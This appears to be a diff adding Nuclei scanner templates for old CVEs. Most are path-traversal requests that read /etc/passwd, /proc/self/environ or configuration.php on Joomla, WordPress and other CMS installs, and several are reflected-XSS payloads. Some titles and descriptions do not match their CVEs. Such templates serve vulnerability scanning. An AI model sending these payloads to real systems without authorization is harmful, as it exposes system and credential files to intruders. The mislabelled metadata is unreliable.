- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2507.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2507
info:
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/13981
- https://www.cvedetails.com/cve/CVE-2010-2507
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2680.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2680
info:
name: Joomla! Component jesectionfinder - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=[LFI]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2857.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2857
info:
name: Joomla! Component Music Manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
reference: |
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/component/music/album.html?cid=[LFI]%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2918.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2918
info:
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
author: daffainfo
severity: high
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
reference: |
- https://www.exploit-db.com/exploits/31708
- https://www.cvedetails.com/cve/CVE-2010-2918
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-3203.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-3203
info:
name: Joomla! Component PicSell 1.0 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
reference: |
- https://www.exploit-db.com/exploits/14845
- https://www.cvedetails.com/cve/CVE-2010-3203
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4282.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4282
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
reference: |
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4719.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4719
info:
name: Joomla! Component JRadio - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jradio&controller=[LFI]%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4769.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4769
info:
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15585
- https://www.cvedetails.com/cve/CVE-2010-4769
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4977.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4977
info:
name: Joomla! Component Canteen 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/34250
- https://www.cvedetails.com/cve/CVE-2010-4977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-5028.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-5028
info:
name: Joomla! Component JE Job 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
reference: |
- https://www.exploit-db.com/exploits/12601
- https://www.cvedetails.com/cve/CVE-2010-5028
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-5286.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-5286
info:
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2011/CVE-2011-2744.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference: |
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
tags: cve,cve2011,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0981.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0996.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0996
info:
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
reference: |
- https://www.exploit-db.com/exploits/36784
- https://www.cvedetails.com/cve/CVE-2012-0996
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-1226.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-1226
info:
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
reference: |
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2014/CVE-2014-10037.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference: |
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2014/CVE-2014-4539.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.cookie)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4550.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4558.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4561.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4592.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2014/CVE-2014-5111.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2014/CVE-2014-5258.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference: |
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2015/CVE-2015-4414.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-4414
info:
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference: |
- https://www.exploit-db.com/exploits/37274
- https://www.cvedetails.com/cve/CVE-2015-4414
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2015/CVE-2015-4632.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference: |
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
tags: cve,cve2015,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200